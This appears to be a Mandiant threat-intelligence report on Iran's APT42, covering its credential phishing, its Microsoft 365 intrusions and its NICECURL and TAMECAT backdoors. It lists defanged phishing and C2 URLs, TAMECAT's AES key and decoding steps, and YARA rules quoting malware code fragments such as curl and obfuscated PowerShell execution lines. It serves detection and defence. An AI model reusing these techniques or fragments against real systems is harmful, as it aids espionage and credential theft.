Uncharmed: Untangling Iran’s APT42 Operations

Written by: Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, Jonathan Leathery

APT42, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain access to victim networks, including cloud environments. The actor is targeting Western and Middle Eastern NGOs, media organizations, academia, legal services and activists. Mandiant assesses APT42 operates on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).

APT42 was observed posing as journalists and event organizers to build trust with their victims through ongoing correspondence, and to deliver invitations to conferences or legitimate documents. These social engineering schemes enabled APT42 to harvest credentials and use them to gain initial access to cloud environments. Subsequently, the threat actor covertly exfiltrated data of strategic interest to Iran, while relying on built-in features and open-source tools to avoid detection.

In addition to cloud operations, we also outline recent malware-based APT42 operations using two custom backdoors: NICECURL and TAMECAT. These backdoors are delivered via spear phishing, providing the attackers with initial access that might be used as a command execution interface or as a jumping point to deploy additional malware.

APT42 targeting and missions are consistent with its assessed affiliation with the IRGC-IO, which is a part of the Iranian intelligence apparatus that is responsible for monitoring and preventing foreign threats to the Islamic Republic and domestic unrest.

APT42 activities overlap with the publicly reported actors CALANQUE (Google Threat Analysis Group), Charming Kitten (ClearSky and CERTFA), Mint Sandstorm/Phosphorus (Microsoft), TA453 (Proofpoint), Yellow Garuda (PwC), and ITG18 (IBM X-Force).

Mandiant identified at least three clusters of infrastructure used by APT42 to harvest credentials from targets in the policy and government sectors, media organizations and journalists, and NGOs and activists. The three clusters employ similar tactics, techniques and procedures (TTPs) to target victim credentials (spear-phishing emails), but use slightly varied domains, masquerading patterns, decoys, and themes.

A full list of the infrastructure is available in the Indicators of Compromise (IOCs) section.

Cluster A: Posing as News Outlets and NGOs

• Active: 2021 – today
• Suspected Targeting: credentials of journalists, researchers, and geopolitical entities in regions of interest to Iran. 
• Masquerading as: The Washington Post (U.S.), The Economist (UK), The Jerusalem Post (IL), Khaleej Times (UAE), Azadliq (Azerbaijan), and more news outlets and NGOs. This often involves the use of typosquatted domains like washinqtonpost[.]press.
  
  Mandiant did not observe APT42 target or compromise these organizations, but rather impersonate them.
• Attack vector: Malicious links from typo-squatted domains that are masquerading as news articles likely sent via spear phishing, redirecting the user to fake Google login pages.

Cluster C: Posing as “Mailer Daemon,” URL Shortening Services and NGOs

• Active: 2022 – today
• Targeting: individuals and entities affiliated with various defense, foreign affairs, and academic issues in the U.S. and Israel.
  • Specifically, in November 2023, Mandiant observed this cluster targeting a nuclear physics professor in a major Israeli university, by using the following phishing URL likely masquerading as a legitimate Microsoft 365 login:

hxxps://email-daemon[.]online/<university_acronym>365[.]onmicrosofl[.]com/accountID=<target_handle>

• Masquerading as: NGOs, “Mailer Daemon,” and Bitly URL shortening service.
• Attack vector: legitimate links likely sent via spear phishing, posing as invitations to conferences or legitimate documents hosted on cloud infrastructure. Upon entry, the user is prompted to enter their credentials, which are sent to the attackers.

In these cases, Mandiant observed APT42 encode targets or lures using “1337” (leet) writing. For example, the name of Tamir Pardo (the former head of the Israeli Mossad) was represented in the url hxxps://bitly[.]org[.]il/t4m1rpa by replacing “a” with 4 and “i” with 1.

• APT42 likely attempted to use lures related to the International Counter-Intelligence summit (“ICT-2023”) conducted in Israel, by deploying the following URLs:
  • hxxps://bitly[.]org[.]il/J03p4y3r
  • hxxps://youtransfer[.]live/ICT-2023/J03py3r

Head(er) In The Cloud: Targeting Microsoft 365 Environments

As an extension of their aforementioned credential harvesting operations, during 2022–2023, Mandiant observed APT42 exfiltrate documents of interest to Iran and sensitive information from the victims’ public cloud infrastructure. These victims were located in the U.S. and the UK in the legal services and NGO sectors. However, since the initial enabler of these operations lies with credential harvesting, which APT42 conducts worldwide, it is possible the victimology is much wider.

These operations began with enhanced social engineering schemes to gain the initial access to victim networks, often involving ongoing trust-building correspondence with the victim. Only then the desired credentials are acquired and multi-factor authentication (MFA) is bypassed, by serving a cloned website to capture the MFA token (which failed) and later by sending MFA push notifications to the victim (which succeeded). 

These techniques have allowed APT42 to covertly access and compromise the victim’s Microsoft 365 environment, relying on built-in features and open-source tools to decrease their chances of being detected.

APT42 deployed multiple defense evasion techniques to minimize their intrusion footprint:

• Relying on built-in features of the Microsoft 365 environment and publicly available tools. This serves as double functionality to harden attribution based on tooling and to blend in the environment, while it shows an increase in adaptability.
• Clearing Google Chrome browser history after reviewing documents of interest.
• Attempting (and possibly succeeding) to exfiltrate files to a OneDrive account masquerading as the victim’s organization, using the fake email address <victim_org_name>@outlook[.]com. APT42 also browsed and downloaded files from the victim’s OneDrive to disk, likely to access files of interest. 
• Using anonymized infrastructure to interact with the victim’s environment, including ExpressVPN nodes, Cloudflare-hosted domains, and ephemeral VPS servers. 

Despite the previously listed defense evasion techniques, Mandiant was able to attribute the cloud operations to APT42 based on the usage of domains overlapping with APT42 credential harvesting operations and the very specific Iran-related nature of intelligence collected by the actor. 

APT42 Malware-Based Operations

Mandiant tracks several APT42 campaigns using custom malware. Most recently, Mandiant observed APT42 deploy two custom backdoors, TAMECAT and NICECURL. Both of these backdoors were delivered with decoy content (likely via spear phishing) and provide APT42 operators with initial access to the targets. The backdoors provide a flexible code-execution interface that may be used as a jumping point to deploy additional malware or to manually execute commands on the device.

Mandiant estimates APT42 used these backdoors to target NGOs, government, or intergovernmental organizations around the world, handling issues related to Iran and the Middle East, consistent with APT42 targeting profile.

Table 1: APT42 Malware Families

NICECURL

NICECURL is a backdoor written in VBScript that can download additional modules to be executed, including a datamining module, and it provides an arbitrary command execution interface. The backdoor’s accepted commands include “kill” to remove artifacts and end execution, “SetNewConfig” to set a new sleep value, and “Module” to download and execute additional files, potentially extending NICECURL’s functionality. NICECURL communicates over HTTPS.

In January 2024, Mandiant observed a malicious LNK file downloading NICECURL and a PDF decoy that masqueraded as an Interview Feedback Form of the Harvard T.H. Chan School of Public Health (Figure 18). The decoy mentions an interviewee by the name of Daniel Serwer, possibly referring to the scholar and foreign policy researcher by the same name, affiliated with the Middle East Institute. It is noteworthy that Mandiant has no indication these entities were targeted or compromised, but merely spoofed by APT42 decoys.

In February 2024, Mandiant identified another NICECURL sample named kuzen.vbs (MD5: 347b273df245f5e1fcbef32f5b836f1d), which connects to worried-eastern-salto[.]glitch[.]me and downloads a decoy file, question-Em.pdf (MD5: 2f6bf8586ed0a87ef3d156124de32757), about Empowering Women for Peace from an American think tank specializing in U.S. foreign policy and international relations (Figure 20).

According to the contents of the decoy file, the attack possibly happened in January or the beginning of February 2024 and targeted a victim located in Australia.

Mandiant also observed a similarly named encrypted RAR file named “question_Empowering Women for Peace Gender Equality in Conflict Prevention and Resolution (6).rar” (MD5: 13aa118181ac6a202f0a64c0c7a61ce7). This RAR file shares the same name with the decoy PDF and likely targeted the same victim. 

This infection chain was previously documented by Volexity.

TAMECAT 

In March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold that can execute arbitrary PowerShell or C# content. TAMECAT is dropped by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant previously observed TAMECAT used in a large-scale APT42 spear-phishing campaign targeting individuals or entities employed by or affiliated with NGOs, government, or intergovernmental organizations around the world.

TAMECAT Execution

Execution begins with a small VBScript downloader that leverages Windows Management Instrumentation (WMI) to query anti-virus products running on the victim’s system. Depending on the script determining if Windows Defender is running, differing download commands and URLs are used.

If Windows Defender is running, the script will leverage conhost to execute a PowerShell command that uses Wget to download content at the following URL: hxxps://s3[.]tebi[.]io/icestorage/config/nconf.txt.

For all other cases, the script uses Cmd.exe to execute a Curl command that is similar to Curl commands used in the NICECURL execution chain previously described:

The downloaded script, nconf.txt (MD5: 081419a484bbf99f278ce636d445b9d8), is a PowerShell script that contains an obfuscated and AES-encrypted TAMECAT backdoor. The script also downloads an additional PowerShell that is used to AES decrypt the embedded TAMECAT backdoor.

When downloading the AES decryption script, the following hard-coded User-agent string is used:

• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

It is noteworthy that the script contains a unique TAMECAT key value T2r0y1M1e1n1o0w1 that was used in a previously reported TAMECAT sample observed in June 2023 (MD5: dd2653a2543fa44eaeeff3ca82fe3513), further indicating the two samples belong to the same malware family. However, the unique value is not used in the script.

The script stores the URL for the AES decryption script as a Base64 string where the first three characters are truncated and the remaining string is Base64 decoded: 

• pepaHR0cHM6Ly9zMy50ZWJpLmlvL2ljZXN0b3JhZ2UvZGYzMnMudHh0
  • Decodes to: hxxps://s3[.]tebi[.]io/icestorage/df32s.txt
• The script stored at this URL is df32s.txt (MD5: c3b9191f3a3c139ae886c0840709865e)

The response content is Base64 decoded and also further decoded using a routine that does the following:

• Inverts the bits of each byte within an array named $bytesOfRes
• Extracts the least significant byte (8 bits) from the inverted representation
• Converts the extracted byte back into a numerical byte value

Once decoded, the resulting PowerShell function resembles the following:

The decoded script is a function that is mainly used to AES decrypt parameters that are passed to it. In addition, it defines global variables including a C2 domain, which are used by the TAMECAT backdoor that gets decrypted and executed.

The following AES key and IV are used to decrypt content:

• AES Key: kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B
• AES IV: 0T9r1y1M2e0N0o1w

The parent script uses the AES decrypt function to decode Base64, and AES decrypts the following string that is contained in the parent script:

The TAMECAT backdoor initially writes a likely victim identifier to the following location: %LOCALAPPDATA%config.txt.

The TAMECAT backdoor makes an initial POST request to the globally defined C2 domain: hxxps://accurate-sprout-porpoise[.]glitch[.]me. 

The initial POST request contains information like the following, which are AES encrypted and Base64 encoded:

The TAMECAT backdoor AES encrypts the content using the key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B and a randomly generated 16-character IV, generated from the string ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. The randomly generated IV is added to the POST request in a header called Content-DPR. The AES key is not transmitted to the C2, so it is likely the same AES key is used for multiple victims. 

If the response is successful, it is also expected to contain a header named Content-DPR, which is expected to house an IV used with the aforementioned AES key to decrypt the response data.

The decrypted response data is split by the paragraph symbol (¶) into four values:

• Language
• Command
• ThreadName
• StartStop

The available commands appear mostly the same as previously identified TAMECAT samples:

Table 2: Available commands

Outlook and Implications

APT42 has remained relatively focused on intelligence collection and targeting similar victimology, despite the Israel-Hamas war that has led other Iran-nexus actors to adapt by conducting disruptive, destructive, and hack-and-leak activities. 

In addition to deploying custom implants on compromised devices, APT42 was also observed conducting extensive cloud operations. In cloud environments not vulnerable to implants, APT42 relies on social engineering to harvest credentials and collect intelligence of strategic interest to Iran. Credential abuse was also emphasized as a common initial access vector to cloud environments in the latest Google Cloud Threat Horizons report.

The methods deployed by APT42 leave a minimal footprint and might make the detection and mitigation of their activities more challenging for network defenders. The TTPs, IOCs, and provided rules included in this blog post may support detection and mitigation efforts.

For Google Chronicle Enterprise+ customers, Chronicle rules have been released to your Emerging Threats rule pack, and IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence. In addition, the IOCs listed in this blog post are blocked in Safe Browsing, protecting Google Chrome users, as well as other browsers.

NICECURL: YARA Rules

rule M_APT_Backdoor_NICECURL_1 {
	meta:
		author = "Mandiant"
		md5 = "c23663ebdfbc340457201dbec7469386"
		date_created = "2024-01-18"
	    date_modified = "2024-01-18"
	    rev = "1"
	strings:
		$ = "a = "llehS.tpircsW"" ascii wide
		$ = "b = StrReverse(a)" ascii wide
		$ = "Set objShell = wscript.CreateObject(b)"
		$ = "WHFilePath = Temp & "/" & ProgName" ascii wide
		$ = "Do While not FileExists(WHFilePath)" ascii wide
		$ = "cmd /C start /MIN curl --ssl-no-revoke -s -d """" ascii wide
		$ = "nicecmdPath = Temp & "/" & ProgName" ascii wide
		$ = "Function RunCom(Com, Url, nicecmdPath)" ascii wide
		$ = "ComDecode = Base64Decode(Com)" ascii wide
		$ = "InStr(ComDecode, "kill")" ascii wide
		$ = "InStr(ComDecode, "SetNewConfig")" ascii wide
		$ = "InStr(ComDecode, "Module")" ascii wide
		$ = "Sub DeleteFile(filespec)" ascii wide
		$ = "Sub CopyFile(Src, Dst)" ascii wide
		$ = "Function SendData(sUrl, sRequest, nicecmdPath)" ascii wide
		$ = "Function WriteToFile(FilePath, data)" ascii wide
		$ = "Function GetSystemCaption()" ascii wide
		$ = "Function GetPlainSess()" ascii wide
	condition:
	4 of them
}

rule M_APT_Backdoor_NICECURL_datamine_module_1 {
	meta:
		author = "Mandiant"
		md5 = "853687659483d215309941dae391a68f"
		date_created = "2024-01-18"
	    date_modified = "2024-01-18"
	    rev = "1"
	strings:
		$ = "a = "llehS.tpircsW"" ascii wide
		$ = "b = StrReverse(a)" ascii wide
		$ = "Set objShell = wscript.CreateObject(b)" ascii wide
		$ = "ModuleName & " module started successfully."" ascii wide
		$ = "SendLog(MAC, Logs, ModuleName, "Success")" ascii wide
		$ = "& vbNewLine  & "*** Ant:"" ascii wide
		$ = "For Each antivirus in installedAntiviruses" ascii wide
		$ = "list=list & VBNewLine & antivirus.displayName" ascii wide
		$ = "checking the state of the 12th bit of productState property of 
the antivirus" ascii wide
		$ = "For Each item In query_result" ascii wide
		$ = "Set query_result = objWMI.ExecQuery("" ascii wide
		$ = "Function SendFile(FilePath, ModuleName)" ascii wide
		$ = "Function SendData(Base64Data, FolderName, FileName, Format)" 
ascii wide
		$ = "call HTTPPost(Url, sRequest)" ascii wide
		$ = "ChunckData = Mid(Base64Data, 1, lengthdata)" ascii wide
		$ = "ChunckData = Mid(Base64Data, (i * lengthdata) + 1)" ascii wide
		$ = "ChunckData = Mid(Base64Data, (i * lengthdata) + 1, lengthdata)" 
ascii wide
		$ = "Function SendLog(MAC, Logs, ModuleName, Status)" ascii wide
	condition:
	4 of them
}

rule M_APT_Backdoor_TAMECAT_2 {
	meta:
		author = "Mandiant"
		md5 = "9c5337e0b1aef2657948fd5e82bdb4c3"
		date_created = "2024-03-05"
	    date_modified = "2024-03-05"
	    rev = "1"
	strings:
		$ = "$a.CreateDecryptor($a.Key,$a.iv)"
		$ = "$CommandParts = """
		$ = "$macP = $env:APPDATA+""
		$ = "$macP = "$env:LOCALAPPDATA"
		$ = "$mac += Get-Content -Path $macP"
		$ = "$CommandParts =$SessionResponse.Split(""
		$ = "[string]$CommandPart = "";"
		$ = "Foreach ($CommandPart in $CommandParts)"
		$ = "$CommandPart.Split("~");"
		$ = "elseif($StartStop -eq "stop")"
		$ = "if($StartStop -eq "start")"
		$ = "&(gcm *ke-e*) $Command;"
	condition:
		3 of them and filesize<2MB
}